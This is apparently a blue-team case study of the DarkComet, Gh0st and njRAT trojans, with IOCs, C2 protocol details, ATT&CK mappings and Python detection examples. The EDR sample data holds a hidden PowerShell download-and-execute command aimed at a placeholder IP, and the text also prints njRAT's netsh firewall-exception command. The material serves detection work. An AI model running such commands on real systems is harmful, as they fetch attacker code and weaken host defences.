Case Studies: Remote Access Trojans (RATs): DarkComet, Gh0st and njRAT


1. DarkComet RAT

Overview

  • Author: Jean-Pierre Lesueur (DarkCoderSc)
  • Era: first released ~2008; development halted in 2012 after reports of abuse, though leaked builds circulated for years afterward
  • Victims: Individuals, activists, enterprises, governments
  • Notable Use: Surveillance of Syrian opposition activists during the Arab Spring (2011–2012)

DarkComet was distributed free as a “remote administration tool” but became one of the most abused RATs of its era: the point-and-click builder required no skill, and the client bundled a rich set of spying features.


Infection Vector

  • Phishing emails with:
    • Malicious EXE
    • ZIP/RAR attachments
  • Trojanized software
  • USB propagation

Capabilities

  • Full remote desktop control
  • Keylogging
  • Webcam & microphone access
  • File manager
  • Credential theft
  • Registry editing
  • DDoS module

Persistence Mechanisms

  • Registry Run keys (HKCU or HKLM ...\CurrentVersion\Run; the builder default value name is MicroUpdate, but it is operator-configurable)
  • Startup folder
  • Copy to %APPDATA% or %TEMP% (builder default: %APPDATA%\MSDCSC\msdcsc.exe)
  • Marker key HKCU\Software\DC3_FEXEC written on first run

C2 Communication

  • Custom TCP protocol: traffic is RC4-encrypted with a static key derived from the client version string (#KCMDDC51#-890 for v5.1) plus the optional password, then hex-encoded, so a session looks like a stream of printable hex
  • Handshake: the controller sends IDTYPE, the implant answers SERVER, then host details follow; these decrypt to fixed strings and are the basis of most network signatures
  • Connects back to a configured static IP or domain (frequently dynamic DNS); default port 1604 TCP
  • Optional password, which also changes the RC4 key, so a password-protected build defeats signatures written for the default key

Representative IOCs (DarkComet)

File-Based

Type        Example
File Name   svchost.exe, server.exe, msdcsc.exe (builder default)
File Path   %APPDATA%\Microsoft\svchost.exe, %APPDATA%\MSDCSC\msdcsc.exe
Hash        Placeholder only: 5f4dcc3b5aa765d61d8327deb882cf99 is MD5("password"), not a sample hash; take real hashes from a malware repository or your own sandbox runs

Registry

Key
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\<value>   (value name is configurable; MicroUpdate is the builder default)
HKCU\Software\DC3_FEXEC                                      (marker key created on first run)

Network

Indicator   Example
Port        1604 TCP (builder default; operators change it)
User-Agent  None: the protocol is not HTTP, so HTTP-based detections do not apply
Traffic     Long-lived TCP session carrying hex-encoded RC4 ciphertext; the IDTYPE / SERVER handshake decrypts to fixed strings

2. Gh0st RAT

Overview

  • Origin: China; source code published by the C. Rufus Security Team around 2008
  • Era: ~2008–Present (dozens of forks and variants)
  • Victims: Governments, defense, NGOs, Tibetan and other dissident communities (documented in the 2009 GhostNet report)
  • Associated With: Cyber-espionage / APT activity

Gh0st RAT is known for its publicly available source code, which let many intrusion sets build their own variants, and for its long history in targeted espionage campaigns.


Infection Vector

  • Spear-phishing with malicious documents
  • Exploits (older campaigns)
  • Trojanized installers

Capabilities

  • Live screen viewing
  • Audio surveillance
  • Keystroke logging
  • File exfiltration
  • Process management
  • Proxy tunneling

Persistence Mechanisms

  • Windows services
  • Registry autoruns
  • DLL side-loading

C2 Communication

  • Custom binary protocol over TCP: each packet is a 5-byte tag, a 4-byte total length and a 4-byte decompressed length (both little-endian), followed by a zlib-compressed body
  • The original tag is the string Gh0st; variants change it (HEART, LURK0 and many others), so hunt on the framing, not only the string
  • Compressed rather than encrypted in the original source; some variants add XOR or other encryption on top
  • Often uses port 80/443 to blend in, but the payload is neither HTTP nor TLS, which a protocol-aware sensor will flag as a mismatch

Representative IOCs (Gh0st RAT)

File-Based

Type        Example
File Name   msupdate.exe, svhost.dll (note the misspelled svchost)
Path        %SystemRoot%\System32\msupdate.exe
Hash        Placeholder only: d41d8cd98f00b204e9800998ecf8427e is the MD5 of an empty file, not a sample hash

Registry

Key
HKLM\SYSTEM\CurrentControlSet\Services\<service name>   (e.g. msupdate; the implant usually installs as a service, often a DLL hosted by svchost.exe)

Network

Indicator        Example
C2 Port          80, 443 (carrying non-HTTP / non-TLS traffic)
Traffic Pattern  5-byte tag, two length fields, zlib-compressed body
Beaconing        Low-frequency, persistent sessions

3. njRAT (a.k.a. Bladabindi)

Overview

  • Origin: Written by an author using the handle njq8, out of the Arabic-speaking scene; commonly attributed to the Middle East
  • Era: ~2012–Present
  • Victims: SMBs, individuals, enterprises
  • Notable Trait: Massive scale, a public builder and countless modified forks

njRAT is one of the most widespread commodity RATs; the builder is shared freely, and the implant turns up in everything from financially motivated campaigns to regional espionage.


Infection Vector

  • Phishing emails
  • Fake software cracks
  • Drive-by downloads
  • Social media file sharing

Capabilities

  • Remote shell
  • Credential dumping
  • Keylogging
  • Screenshot capture
  • File upload/download
  • USB spreading

Persistence Mechanisms

  • Registry Run keys (HKCU and HKLM ...\CurrentVersion\Run; the value name is set in the builder)
  • Startup folder copy
  • Scheduled Tasks (seen in some loaders and forks)
  • Copy to %APPDATA% or %TEMP% under a system-looking name
  • Adds itself to the Windows Firewall allow list with netsh firewall add allowedprogram ... ENABLE, which is a reliable detection in its own right

C2 Communication

  • Custom plaintext protocol over TCP, not HTTP: each message is an ASCII decimal length, a NUL byte, then the body
  • Fields inside a message are separated by the literal string |'|'| ; the first message from an implant is the ll registration, carrying a base64 victim tag (default prefix HacKed), hostname, username, OS and client version
  • Dynamic DNS hostnames (No-IP, DuckDNS) are the norm; builder default ports such as 1177 and 5552 are common
  • Base64 is applied to individual fields, not the whole stream, so the delimiter stays visible on the wire
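Because the framing and delimiter are constant across builds, a small parser catches njRAT traffic that no hash or domain would. This is an added example written for this page, not njRAT's own code: it reassembles length-prefixed frames, splits on the delimiter and decodes the victim tag. The sample stream is constructed here, and the field order after the victim tag is an assumption for illustration.

```python
"""Added example: frame and parse njRAT-style registration messages. Editor-supplied
code, not njRAT's; the field order after the victim tag is illustrative."""
import base64
import binascii

DELIM = "|'|'|"  # literal field separator used by njRAT


def split_frames(stream: bytes):
    """Yield message bodies from njRAT's framing: ASCII decimal length, NUL, body."""
    pos = 0
    while pos < len(stream):
        nul = stream.find(b"\x00", pos)
        if nul == -1 or not stream[pos:nul].isdigit():
            break  # not njRAT framing
        length = int(stream[pos:nul])
        body = stream[nul + 1:nul + 1 + length]
        if len(body) != length:
            break  # truncated frame; a real reassembler would wait for more data
        yield body
        pos = nul + 1 + length


def decode_b64_field(field: str):
    """Return the decoded text of a base64 field, or None if it is not base64."""
    try:
        return base64.b64decode(field, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def parse_ll(body: bytes):
    """Parse an 'll' registration message into a dict, or return None."""
    fields = body.decode("latin-1").split(DELIM)
    if fields[0] != "ll" or len(fields) < 2:
        return None
    victim = decode_b64_field(fields[1])
    return {
        "victim_tag": victim,  # built as <prefix>_<HWID>; the builder default prefix is HacKed
        "hacked_default_prefix": victim is not None and victim.startswith("HacKed_"),
        "rest": fields[2:],    # hostname, user, OS ... (order varies by version)
    }


def build_sample_stream() -> bytes:
    """Constructed sample traffic, not a capture. Field order is an assumption."""
    tag = base64.b64encode(b"HacKed_C0FFEE12").decode()
    body = DELIM.join(["ll", tag, "WIN-LAB01", "labuser", "", "Win 7 SP1", "No", "0.7d"]).encode()
    return str(len(body)).encode() + b"\x00" + body


if __name__ == "__main__":
    for frame in split_frames(build_sample_stream()):
        print(parse_ll(frame))
```

The delimiter alone is a good IDS content match; the parser adds the victim tag, which ties network hits back to the host and tells you whether the operator bothered to change the default name.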

Representative IOCs (njRAT)

File-Based

Type        Example
File Name   server.exe, winlogon.exe
Path        %APPDATA%\Microsoft\winlogon.exe (%APPDATA% already expands to ...\AppData\Roaming, so a literal "Roaming\Roaming" path is a sign of a bad IOC, not of njRAT)
Hash        Placeholder only: e99a18c428cb38d5f260853678922e03 is MD5("abc123"), not a sample hash

Registry

Key
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\<value>   (value name is set in the builder)
Firewall exception added with: netsh firewall add allowedprogram "<path>" "<name>" ENABLE

Network

Indicator   Example
Domain      example.ddns.net (dynamic DNS)
Beacon      ll|'|'|<base64 victim tag>|'|'|<hostname>|'|'|<user>... inside a length-prefixed TCP message
Data        Base64 fields between |'|'| delimiters; no HTTP headers at all

4. MITRE ATT&CK Mapping (Common Across All)

Tactic               Technique
Initial Access       Spearphishing Attachment (T1566.001); Replication Through Removable Media (T1091) for the DarkComet and njRAT USB spreaders
Execution            User Execution: Malicious File (T1204.002)
Persistence          Registry Run Keys / Startup Folder (T1547.001); Create or Modify System Process: Windows Service (T1543.003) for Gh0st
Credential Access    OS Credential Dumping (T1003); Input Capture: Keylogging (T1056.001)
Collection           Screen Capture (T1113); Video Capture (T1125); Audio Capture (T1123)
Defense Evasion      Obfuscated Files or Information (T1027); Hijack Execution Flow: DLL Side-Loading (T1574.002) for Gh0st variants
Command and Control  Non-Application Layer Protocol (T1095) for all three; Dynamic Resolution (T1568) for dynamic-DNS C2; Web Protocols (T1071.001) only where a fork wraps its traffic in HTTP
Exfiltration         Exfiltration Over C2 Channel (T1041)

Note that credential dumping is a Credential Access technique, not Privilege Escalation; these RATs run with whatever privileges the phished user already had.

5. SOC Detection & Hunting Tips

Endpoint

  • Look for unsigned binaries running from %APPDATA%, %TEMP% or other user-writable paths that hold outbound connections
  • Monitor registry autoruns (Run keys, Services) and the Startup folder for new entries and diff them against a baseline
  • Detect keylogging APIs: SetWindowsHookEx with WH_KEYBOARD_LL, or tight GetAsyncKeyState polling, from a process with no window
  • Alert on netsh firewall add allowedprogram (njRAT) and on services whose binary lives outside System32

Network

  • Identify periodic beaconing: many connections to one destination with low-jitter inter-arrival times
  • Alert on dynamic DNS resolutions from servers and from hosts with no business need for them
  • Flag protocol mismatches: non-TLS on 443 and non-HTTP on 80 (Gh0st), hex-only streams on odd ports (DarkComet), the |'|'| delimiter in cleartext (njRAT); where TLS is used, inspect for self-signed or freshly issued certificates

6. Comparative Summary Table

Feature      DarkComet                    Gh0st RAT                        njRAT
Targeting    Broad                        Targeted / APT                   Mass-scale
C2           Custom TCP (RC4, port 1604)  Custom TCP (zlib, often 80/443)  Custom TCP + dynamic DNS (e.g. 1177)
Persistence  Registry Run keys            Windows services                 Registry Run keys / Startup folder
Key Feature  Webcam and desktop spying    Espionage, many forks            Automation, builder for novices
Skill Level  Low–Medium                   Medium–High (source available)   Low
Usage Today  Rare                         Modified variants                Still common

Why Static IOCs Alone Are Insufficient

IOC Type      Why It Fails
File Hash     Changes with every rebuild from the builder; packers and crypters make it worse
File Name     Chosen by the operator, usually mimicking a system binary
IP Address    VPS rotation, fast-flux
Domain        Dynamic DNS, DGAs
Registry Key  Value names and install paths are configurable
User-Agent    Easily spoofed, and these three families are not HTTP at all

Static IOCs = tactical, not strategic detection


Modern RAT Detection Strategy (Layered)

1. Behavioral Detection (Most Important)

Behavioral detection focuses on what malware does, not how it looks.

Key RAT Behaviors

Behavior              Example
Persistence Creation  Registry Run keys, services, scheduled tasks
Keylogging            SetWindowsHookEx keyboard hooks, GetAsyncKeyState polling
Screen Capture        GDI BitBlt / DirectX frame grabs from a process with no window
Credential Access     Opening LSASS with read access
Process Injection     VirtualAllocEx + WriteProcessMemory + CreateRemoteThread
Beaconing             Regular outbound traffic from one process
LOLbin Abuse          PowerShell, rundll32, mshta

Example Behavioral Signals

  • Non-UI process capturing screenshots
  • Office app spawning PowerShell → network
  • Unsigned process injecting into explorer.exe

➡️ Resilient against recompilation


2. Threat Hunting (Proactive)

Threat hunting assumes compromise may already exist.

RAT-Focused Hunting Hypotheses

Hypothesis               Hunt Idea
RAT persistence exists   Search autoruns
RAT beaconing present    Find periodic traffic
RAT in memory            Look for injected code
RAT stole creds          LSASS access events
RAT lateral movement     SMB/RDP anomalies

Example Hunt Queries (Conceptual)

  • Processes with:
    • Network access + no disk file
    • Unsigned + long runtime
  • Scheduled tasks with random names
  • Outbound connections to Dynamic DNS
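The two network hunts listed above (periodic traffic, dynamic DNS) and the same items under "SOC Detection & Hunting Tips" reduce to a few lines over flow records. This is an added example for this page, not code from any product: it groups constructed Zeek-style connection records by source, destination and port, scores the regularity of their inter-arrival gaps with the coefficient of variation, and separately lists dynamic-DNS resolutions. The records, the threshold values and the DDNS suffix list are assumptions to tune locally.

```python
"""Added example: hunt flow records for low-jitter beaconing and dynamic-DNS C2.
Editor-supplied code; the records below are constructed, not real telemetry."""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed Zeek-conn-like records: (epoch seconds, src, dst, dport, resolved name or "")
RECORDS = [
    # implant checking in roughly every 60 s (small jitter) to a dynamic-DNS host
    (0.0,   "10.0.0.5", "203.0.113.10", 1177, "lab-host.ddns.net"),
    (60.0,  "10.0.0.5", "203.0.113.10", 1177, "lab-host.ddns.net"),
    (122.0, "10.0.0.5", "203.0.113.10", 1177, "lab-host.ddns.net"),
    (180.0, "10.0.0.5", "203.0.113.10", 1177, "lab-host.ddns.net"),
    (241.0, "10.0.0.5", "203.0.113.10", 1177, "lab-host.ddns.net"),
    (300.0, "10.0.0.5", "203.0.113.10", 1177, "lab-host.ddns.net"),
    (360.0, "10.0.0.5", "203.0.113.10", 1177, "lab-host.ddns.net"),
    (420.0, "10.0.0.5", "203.0.113.10", 1177, "lab-host.ddns.net"),
    # ordinary browsing from the same host: bursty and irregular
    (5.0,   "10.0.0.5", "198.51.100.7", 443, "www.example.com"),
    (9.0,   "10.0.0.5", "198.51.100.7", 443, "www.example.com"),
    (200.0, "10.0.0.5", "198.51.100.7", 443, "www.example.com"),
    (210.0, "10.0.0.5", "198.51.100.7", 443, "www.example.com"),
    (700.0, "10.0.0.5", "198.51.100.7", 443, "www.example.com"),
    (701.0, "10.0.0.5", "198.51.100.7", 443, "www.example.com"),
]

# Dynamic-DNS suffixes commonly seen with njRAT and DarkComet; extend from your own intel.
DDNS_SUFFIXES = (".ddns.net", ".no-ip.org", ".no-ip.biz", ".duckdns.org", ".hopto.org")


def is_ddns(name: str) -> bool:
    return name.lower().endswith(DDNS_SUFFIXES)


def ddns_hits(records):
    """Unique (src, name) pairs that resolved a dynamic-DNS host."""
    return sorted({(src, name) for _, src, _, _, name in records if name and is_ddns(name)})


def beacon_candidates(records, min_conns=6, max_cv=0.2):
    """Flag (src, dst, dport) tuples whose inter-connection gaps have a low
    relative spread (coefficient of variation <= max_cv). Thresholds are assumed
    starting points; raise min_conns on busy links to cut noise."""
    by_pair = defaultdict(list)
    for ts, src, dst, dport, _ in records:
        by_pair[(src, dst, dport)].append(ts)
    hits = []
    for key, stamps in by_pair.items():
        if len(stamps) < min_conns:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg else float("inf")
        if cv <= max_cv:
            hits.append({"pair": key, "interval_s": round(avg, 1),
                         "cv": round(cv, 3), "count": len(stamps)})
    return hits


if __name__ == "__main__":
    for h in beacon_candidates(RECORDS):
        print("beacon:", h)
    for src, name in ddns_hits(RECORDS):
        print("dynamic DNS:", src, name)
```

Jittered implants still score low on this test because the jitter is small relative to the interval; what defeats it is a sleep that varies by a large fraction of the base interval, which is why the result is a hunting lead to join with the endpoint signals, not an alert on its own.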

➡️ Finds unknown & custom RATs


3. EDR Telemetry (High-Fidelity)

EDR provides deep visibility across endpoints.

Key Telemetry Sources

Telemetry         Value
Process Creation  Parent-child anomalies
Command Line      Obfuscation detection
Memory            Injection indicators
File Writes       Suspicious locations
Registry          Autorun creation
Network           Per-process traffic

RAT Detection via EDR

Signal                                                     Why It Matters
Office → script host → network                             Classic RAT loader chain
svchost.exe running outside System32, or not a child of services.exe, with outbound traffic   Impersonated system process (a genuine svchost.exe talks out all the time, so the parent and path are the signal)
Unsigned service install                                   Persistence
Keyboard hook / API hooking from a windowless process      Keylogging

➡️ EDR correlates events across time
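The Office → script host → network chain from the behavioral signals and the EDR table above is the easiest of these correlations to write down, and it is where EDR beats single-event rules: no one event is malicious, the sequence is. The following is an added example for this page, not vendor code: it joins constructed Sysmon-shaped process-creation and network-connection events into that chain. The event layout, process names and the benign PowerShell decoy are assumptions.

```python
"""Added example: correlate process-creation and network events to catch the
Office -> script host -> network chain. Editor-supplied; the events are constructed
in the shape of Sysmon Event ID 1 (process create) and 3 (network connect)."""
from collections import defaultdict

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "cmd.exe"}

EVENTS = [  # constructed telemetry, not a real capture
    {"id": 1, "pid": 880, "ppid": 600, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"id": 1, "pid": 4100, "ppid": 880,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": '"WINWORD.EXE" C:\\Users\\labuser\\Downloads\\invoice.docm'},
    {"id": 1, "pid": 4220, "ppid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://203.0.113.10/s')\""},
    {"id": 3, "pid": 4220, "dst": "203.0.113.10", "dport": 80},
    {"id": 1, "pid": 5000, "ppid": 880,
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "cmdline": "chrome.exe"},
    {"id": 3, "pid": 5000, "dst": "198.51.100.7", "dport": 443},
    # admin script launched from Explorer: PowerShell with network, but no Office parent
    {"id": 1, "pid": 5100, "ppid": 880,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"id": 3, "pid": 5100, "dst": "10.0.0.20", "dport": 5985},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def office_script_network(events):
    """Return one hit per script host spawned by an Office process that then
    made an outbound connection. Real telemetry should key on ProcessGuid rather
    than PID, which Windows reuses; PIDs are used here only to keep the sample small."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    conns = defaultdict(list)
    for e in events:
        if e["id"] == 3:
            conns[e["pid"]].append((e["dst"], e["dport"]))
    hits = []
    for pid, proc in procs.items():
        if basename(proc["image"]) not in SCRIPT_HOSTS:
            continue
        parent = procs.get(proc["ppid"])
        if parent is None or basename(parent["image"]) not in OFFICE:
            continue
        if pid not in conns:
            continue  # script ran but never talked out; a lower-severity rule's job
        hits.append({"pid": pid, "parent": basename(parent["image"]),
                     "child": basename(proc["image"]), "cmdline": proc["cmdline"],
                     "destinations": conns[pid]})
    return hits


if __name__ == "__main__":
    for hit in office_script_network(EVENTS):
        print(hit)
```

The benign PowerShell process with a network connection is deliberately included: without the parent check it would be a false positive, which is the whole argument for correlating across events rather than alerting on any one of them.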


4. Threat Intelligence Correlation

Threat intelligence adds context, not just IOCs.

What to Correlate

Intelligence Type        Usage
Known TTPs               Map behavior to malware families
Infrastructure Patterns  Hosting providers
Campaign Context         Who/why targeting
Malware Lineage          RAT variants
Timing                   Active campaigns

Example Correlation

  • Behavioral pattern matches njRAT
  • Domain registered recently + Dynamic DNS
  • Hosting in known bulletproof ASN
  • Matches MITRE techniques used by njRAT

➡️ Turns signals into attribution & confidence


How These Four Work Together (Example)

Scenario

  • No known hash
  • No known domain

Detection Flow

  1. Behavioral Detection
    • Registry Run key created
    • Keylogging APIs used
  2. EDR Telemetry
    • Process injected into explorer.exe
    • Periodic HTTPS beacons
  3. Threat Hunting
    • Find similar persistence across hosts
  4. Threat Intelligence
    • Behavior maps to commodity RAT family

➡️ Detection succeeds without static IOCs


Detection Maturity Comparison

Approach             Effectiveness
Static IOCs Only     Low
IOCs + AV            Limited
Behavioral + EDR     High
Hunting + TI + EDR   Very High

Recommended Blue-Team RAT Defense Model

Layer     Action
Endpoint  EDR with behavior rules
Network   Beaconing & DNS analytics
Identity  MFA & credential monitoring
SOC       Continuous hunting
Intel     TTP-focused feeds